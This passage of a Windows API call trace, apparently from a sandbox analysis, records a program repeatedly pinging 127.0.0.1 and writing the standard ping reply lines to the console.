(_FileHandle=1, _Mode=16384) returned 16384 [0043.923] LocalFree (hMem=0xe37fe8) returned 0x0 [0043.923] LocalFree (hMem=0xe37ac8) returned 0x0 [0043.923] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⛿\x94䰨盪✼") returned 0x9 [0043.923] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0043.923] _fileno (_File=0x76ea4c28) returned 1 [0043.923] _get_osfhandle (_FileHandle=1) returned 0x28 [0043.923] GetFileType (hFile=0x28) returned 0x2 [0043.923] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0043.923] GetLastError () returned 0x6 [0043.923] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✼") returned 0x0 [0043.923] _fileno (_File=0x76ea4c28) returned 1 [0043.923] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0043.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0043.923] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a78 [0043.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe28a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0043.923] _fileno (_File=0x76ea4c28) returned 1 [0043.923] _write (in: _FileHandle=1, _Buf=0xe28a78*, _MaxCharCount=0x9 | out: _Buf=0xe28a78*) returned 9 [0043.923] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0043.923] _fileno (_File=0x76ea4c28) returned 1 [0043.923] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0043.923] LocalFree (hMem=0xe28a78) returned 0x0 [0043.923] LocalFree (hMem=0xe37fe8) returned 0x0 [0043.923] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcbf494, nSize=0x0, Arguments=0xcbf490 | out: lpBuffer="翨ã﹤Ë➷\x94䰨盪✧") returned 0x9 [0043.923] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0043.923] _fileno (_File=0x76ea4c28) returned 1 [0043.923] _get_osfhandle (_FileHandle=1) returned 0x28 [0043.923] GetFileType (hFile=0x28) returned 0x2 [0043.923] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf458 | out: lpMode=0xcbf458) returned 0 [0043.923] GetLastError () returned 0x6 [0043.923] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3bc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0043.923] _fileno (_File=0x76ea4c28) returned 1 [0043.923] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0043.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0043.923] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28910 [0043.923] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0043.923] _fileno (_File=0x76ea4c28) returned 1 [0043.924] _write (in: _FileHandle=1, _Buf=0xe28910*, _MaxCharCount=0x9 | out: _Buf=0xe28910*) returned 9 [0043.924] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0043.924] _fileno (_File=0x76ea4c28) returned 1 [0043.924] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0043.924] LocalFree (hMem=0xe28910) returned 0x0 [0043.924] LocalFree (hMem=0xe37fe8) returned 0x0 [0043.924] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⟘\x94䰨盪✨") returned 0x9 [0043.924] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0043.924] _fileno (_File=0x76ea4c28) returned 1 [0043.924] _get_osfhandle (_FileHandle=1) returned 0x28 [0043.924] GetFileType (hFile=0x28) returned 0x2 [0043.924] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0043.924] GetLastError () returned 0x6 [0043.924] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✨") returned 0x0 [0043.924] _fileno (_File=0x76ea4c28) returned 1 [0043.924] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0043.924] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0043.924] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a78 [0043.924] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe28a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0043.924] _fileno (_File=0x76ea4c28) returned 1 [0043.924] _write (in: _FileHandle=1, _Buf=0xe28a78*, _MaxCharCount=0x9 | out: _Buf=0xe28a78*) returned 9 [0043.924] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0043.924] _fileno (_File=0x76ea4c28) returned 1 [0043.924] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0043.924] LocalFree (hMem=0xe28a78) returned 0x0 [0043.924] LocalFree (hMem=0xe37fe8) returned 0x0 [0043.924] Sleep (dwMilliseconds=0x3e8) [0044.937] IcmpSendEcho2Ex (in: IcmpHandle=0xe26b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe2c1b0, RequestSize=0x20, RequestOptions=0xcbf50c, ReplyBuffer=0xe35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe35270) returned 0x1 [0044.938] InetNtopW (in: Family=2, pAddr=0xcbf4fc, pStringBuf=0xcbf624, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0044.938] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë⛔\x94䰨盪✣") returned 0x16 [0044.938] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0044.938] _fileno (_File=0x76ea4c28) returned 1 [0044.938] _get_osfhandle (_FileHandle=1) returned 0x28 [0044.938] GetFileType (hFile=0x28) returned 0x2 [0044.938] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0044.938] GetLastError () returned 0x6 [0044.938] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✣") returned 0x0 [0044.938] _fileno (_File=0x76ea4c28) returned 1 [0044.938] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0044.938] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0044.938] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe37fe8 [0044.938] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe37fe8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0044.938] _fileno (_File=0x76ea4c28) returned 1 [0044.938] _write (in: _FileHandle=1, _Buf=0xe37fe8*, _MaxCharCount=0x16 | out: _Buf=0xe37fe8*) returned 22 [0044.938] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0044.938] _fileno (_File=0x76ea4c28) returned 1 [0044.938] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0044.938] LocalFree (hMem=0xe37fe8) returned 0x0 [0044.938] LocalFree (hMem=0xe37ac8) returned 0x0 [0044.938] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⛿\x94䰨盪✼") returned 0x9 [0044.938] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0044.938] _fileno (_File=0x76ea4c28) returned 1 [0044.938] _get_osfhandle (_FileHandle=1) returned 0x28 [0044.938] GetFileType (hFile=0x28) returned 0x2 [0044.938] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0044.938] GetLastError () returned 0x6 [0044.938] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✼") returned 0x0 [0044.938] _fileno (_File=0x76ea4c28) returned 1 [0044.938] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0044.938] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0044.938] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a90 [0044.938] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe28a90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0044.938] _fileno (_File=0x76ea4c28) returned 1 [0044.938] _write (in: _FileHandle=1, _Buf=0xe28a90*, _MaxCharCount=0x9 | out: _Buf=0xe28a90*) returned 9 [0044.938] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0044.938] _fileno (_File=0x76ea4c28) returned 1 [0044.938] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0044.938] LocalFree (hMem=0xe28a90) returned 0x0 [0044.938] LocalFree (hMem=0xe37fe8) returned 0x0 [0044.938] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcbf494, nSize=0x0, Arguments=0xcbf490 | out: lpBuffer="翨ã﹤Ë➷\x94䰨盪✧") returned 0x9 [0044.938] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0044.938] _fileno (_File=0x76ea4c28) returned 1 [0044.938] _get_osfhandle (_FileHandle=1) returned 0x28 [0044.938] GetFileType (hFile=0x28) returned 0x2 [0044.938] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf458 | out: lpMode=0xcbf458) returned 0 [0044.939] GetLastError () returned 0x6 [0044.939] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3bc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0044.939] _fileno (_File=0x76ea4c28) returned 1 [0044.939] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0044.939] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0044.939] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a78 [0044.939] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe28a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0044.939] _fileno (_File=0x76ea4c28) returned 1 [0044.939] _write (in: _FileHandle=1, _Buf=0xe28a78*, _MaxCharCount=0x9 | out: _Buf=0xe28a78*) returned 9 [0044.939] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0044.939] _fileno (_File=0x76ea4c28) returned 1 [0044.939] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0044.939] LocalFree (hMem=0xe28a78) returned 0x0 [0044.939] LocalFree (hMem=0xe37fe8) returned 0x0 [0044.939] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="翨ã﹤Ë⟘\x94䰨盪✨") returned 0x9 [0044.939] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0044.939] _fileno (_File=0x76ea4c28) returned 1 [0044.939] _get_osfhandle (_FileHandle=1) returned 0x28 [0044.939] GetFileType (hFile=0x28) returned 0x2 [0044.939] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0044.939] GetLastError () returned 0x6 [0044.939] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✨") returned 0x0 [0044.939] _fileno (_File=0x76ea4c28) returned 1 [0044.939] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0044.939] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0044.939] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28958 [0044.939] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe28958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0044.939] _fileno (_File=0x76ea4c28) returned 1 [0044.939] _write (in: _FileHandle=1, _Buf=0xe28958*, _MaxCharCount=0x9 | out: _Buf=0xe28958*) returned 9 [0044.939] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0044.939] _fileno (_File=0x76ea4c28) returned 1 [0044.939] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0044.939] LocalFree (hMem=0xe28958) returned 0x0 [0044.939] LocalFree (hMem=0xe37fe8) returned 0x0 [0044.939] Sleep (dwMilliseconds=0x3e8) [0045.950] IcmpSendEcho2Ex (in: IcmpHandle=0xe26b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe2c1b0, RequestSize=0x20, RequestOptions=0xcbf50c, ReplyBuffer=0xe35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe35270) returned 0x1 [0045.950] InetNtopW (in: Family=2, pAddr=0xcbf4fc, pStringBuf=0xcbf624, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0045.950] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë⛔\x94䰨盪✣") returned 0x16 [0045.950] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0045.950] _fileno (_File=0x76ea4c28) returned 1 [0045.950] _get_osfhandle (_FileHandle=1) returned 0x28 [0045.950] GetFileType (hFile=0x28) returned 0x2 [0045.950] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0045.950] GetLastError () returned 0x6 [0045.950] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✣") returned 0x0 [0045.950] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0045.951] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0045.951] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe38010 [0045.951] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe38010, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0045.951] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _write (in: _FileHandle=1, _Buf=0xe38010*, _MaxCharCount=0x16 | out: _Buf=0xe38010*) returned 22 [0045.951] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0045.951] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0045.951] LocalFree (hMem=0xe38010) returned 0x0 [0045.951] LocalFree (hMem=0xe37ac8) returned 0x0 [0045.951] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="菰ã﹤Ë⛿\x94䰨盪✼") returned 0x9 [0045.951] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0045.951] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _get_osfhandle (_FileHandle=1) returned 0x28 [0045.951] GetFileType (hFile=0x28) returned 0x2 [0045.951] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0045.951] GetLastError () returned 0x6 [0045.951] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✼") returned 0x0 [0045.951] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0045.951] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0045.951] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28910 [0045.951] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xe28910, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0045.951] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _write (in: _FileHandle=1, _Buf=0xe28910*, _MaxCharCount=0x9 | out: _Buf=0xe28910*) returned 9 [0045.951] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0045.951] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0045.951] LocalFree (hMem=0xe28910) returned 0x0 [0045.951] LocalFree (hMem=0xe383f0) returned 0x0 [0045.951] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xcbf494, nSize=0x0, Arguments=0xcbf490 | out: lpBuffer="菰ã﹤Ë➷\x94䰨盪✧") returned 0x9 [0045.951] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0045.951] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _get_osfhandle (_FileHandle=1) returned 0x28 [0045.951] GetFileType (hFile=0x28) returned 0x2 [0045.951] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf458 | out: lpMode=0xcbf458) returned 0 [0045.951] GetLastError () returned 0x6 [0045.951] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3bc, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0045.951] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0045.951] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0045.951] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28a78 [0045.951] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xe28a78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0045.951] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _write (in: _FileHandle=1, _Buf=0xe28a78*, _MaxCharCount=0x9 | out: _Buf=0xe28a78*) returned 9 [0045.951] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0045.951] _fileno (_File=0x76ea4c28) returned 1 [0045.951] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0045.951] LocalFree (hMem=0xe28a78) returned 0x0 [0045.952] LocalFree (hMem=0xe383f0) returned 0x0 [0045.952] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="菰ã﹤Ë⟘\x94䰨盪✨") returned 0x9 [0045.952] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0045.952] _fileno (_File=0x76ea4c28) returned 1 [0045.952] _get_osfhandle (_FileHandle=1) returned 0x28 [0045.952] GetFileType (hFile=0x28) returned 0x2 [0045.952] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0045.952] GetLastError () returned 0x6 [0045.952] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✨") returned 0x0 [0045.952] _fileno (_File=0x76ea4c28) returned 1 [0045.952] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0045.952] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0045.952] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xe28970 [0045.952] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xe28970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0045.952] _fileno (_File=0x76ea4c28) returned 1 [0045.952] _write (in: _FileHandle=1, _Buf=0xe28970*, _MaxCharCount=0x9 | out: _Buf=0xe28970*) returned 9 [0045.952] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0045.952] _fileno (_File=0x76ea4c28) returned 1 [0045.952] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0045.952] LocalFree (hMem=0xe28970) returned 0x0 [0045.952] LocalFree (hMem=0xe383f0) returned 0x0 [0045.952] Sleep (dwMilliseconds=0x3e8) [0046.965] IcmpSendEcho2Ex (in: IcmpHandle=0xe26b80, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xe2c1b0, RequestSize=0x20, RequestOptions=0xcbf50c, ReplyBuffer=0xe35270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xe35270) returned 0x1 [0046.966] InetNtopW (in: Family=2, pAddr=0xcbf4fc, pStringBuf=0xcbf624, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0046.966] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="竈ã﹤Ë⛔\x94䰨盪✣") returned 0x16 [0046.966] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0046.966] _fileno (_File=0x76ea4c28) returned 1 [0046.966] _get_osfhandle (_FileHandle=1) returned 0x28 [0046.966] GetFileType (hFile=0x28) returned 0x2 [0046.966] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0046.966] GetLastError () returned 0x6 [0046.966] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✣") returned 0x0 [0046.966] _fileno (_File=0x76ea4c28) returned 1 [0046.966] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0046.966] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0046.966] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xe38250 [0046.966] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xe38250, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0046.966] _fileno (_File=0x76ea4c28) returned 1 [0046.966] _write (in: _FileHandle=1, _Buf=0xe38250*, _MaxCharCount=0x16 | out: _Buf=0xe38250*) returned 22 [0046.967] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0046.967] _fileno (_File=0x76ea4c28) returned 1 [0046.967] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0046.967] LocalFree (hMem=0xe38250) returned 0x0 [0046.967] LocalFree (hMem=0xe37ac8) returned 0x0 [0046.967] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xcbf490, nSize=0x0, Arguments=0xcbf48c | out: lpBuffer="诸ã﹤Ë⛿\x94䰨盪✼") returned 0x9 [0046.967] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0046.967] _fileno (_File=0x76ea4c28) returned 1 [0046.967] _get_osfhandle (_FileHandle=1) returned 0x28 [0046.967] GetFileType (hFile=0x28) returned 0x2 [0046.967] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xcbf454 | out: lpMode=0xcbf454) returned 0 [0046.967] GetLastError () returned 0x6 [0046.967] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcbf3b8, nSize=0x50 | out: lpBuffer="Ë✼") returned 0x0 [0046.967] _fileno (_File=0x76ea4c28) returned 1 [0046.967] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0046.967] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 